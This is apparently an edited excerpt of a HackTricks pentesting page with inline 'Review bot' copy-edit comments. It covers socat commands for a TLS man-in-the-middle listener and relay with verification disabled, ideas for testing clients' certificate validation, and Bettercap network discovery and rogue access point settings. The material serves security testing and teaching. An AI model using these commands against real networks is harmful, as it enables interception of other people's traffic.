### Listen using certificate
#### Listen using certificate
```
sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0 -
```
### Listen using certificate and redirect to the hosts
#### Listen using certificate and redirect to the hosts
```
sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0 openssl-connect:[SERVER]:[PORT],verify=0
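Review bot: these fences are untagged as well. `verify=0` on both the `openssl-listen` and `openssl-connect` sides disables certificate verification, which is intended here (the listener presents a self-signed cert and relays blindly), but the text should say so, since the same option would be a serious bug in a real client.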
@ -727,7 +733,7 @@ Another interesting test, is to serve a c**ertificate of the requested hostname
Other things to test is to try to sign the certificate with a valid certificate that it is not a valid CA. Or to use the valid public key, force to use an algorithm as diffie hellman (one that do not need to decrypt anything with the real private key) and when the client request a probe of the real private key (like a hash) send a fake probe and expect that the client does not check this.
# Bettercap 2
## Bettercap 2
```bash
# Events
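Review bot: `serve a c**ertificate` opens the bold mid-word; it should be `**certificate**`. `Other things to test is to try` → "are"; `diffie hellman` → "Diffie-Hellman"; `a probe of the real private key` → "a proof of possession of the real private key"; `force to use an algorithm` → "force the use of a key exchange".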
@ -755,15 +761,15 @@ set wifi.ap.encryption false #If true, WPA2
wifi.recon on; wifi.ap
```
## Active Discovery Notes
### Active Discovery Notes
Take into account that when a UDP packet is sent to a device that do not have the requested port an ICMP (Port Unreachable) is sent.
## **ARP discover**
### **ARP discover**
ARP packets are used to discover wich IPs are being used inside the network. The PC has to send a request for each possible IP address and only the ones that are being used will respond.
## **mDNS (multicast DNS)**
### **mDNS (multicast DNS)**
Bettercap send a MDNS request (each X ms) asking for **\_services\_.dns-sd.\_udp.local** the machine that see this paket usually answer this request. Then, it only searchs for machine answering to "services".
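Review bot: `a device that do not have` → "does not have"; `wich` → "which"; `Bettercap send` → "sends"; `paket` → "packet"; `searchs` → "searches".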
@ -773,19 +779,18 @@ Bettercap send a MDNS request (each X ms) asking for **\_services\_.dns-sd.\_udp
* Bettercap (net.probe.mdns)
* Responder
## **NBNS (NetBios Name Server)**
### **NBNS (NetBios Name Server)**
Bettercap broadcast packets to the port 137/UDP asking for the name "CKAAAAAAAAAAAAAAAAAAAAAAAAAAA".
## **SSDP (Simple Service Discovery Protocol)**
### **SSDP (Simple Service Discovery Protocol)**
Bettercap broadcast SSDP packets searching for all kind of services (UDP Port 1900).
## **WSD (Web Service Discovery)**
### **WSD (Web Service Discovery)**
Bettercap broadcast WSD packets searching for services (UDP Port 3702).
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
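Review bot: the NBNS name `CKAAAAAAAAAAAAAAAAAAAAAAAAAAA` is the first-level encoding of the wildcard name `*`, which is 32 characters (`CK` followed by 30 `A`); verify the string in the hunk has the full count, as it looks short. `Bettercap broadcast packets` / `broadcast SSDP packets` / `broadcast WSD packets` → "broadcasts".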
@ -801,5 +806,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details>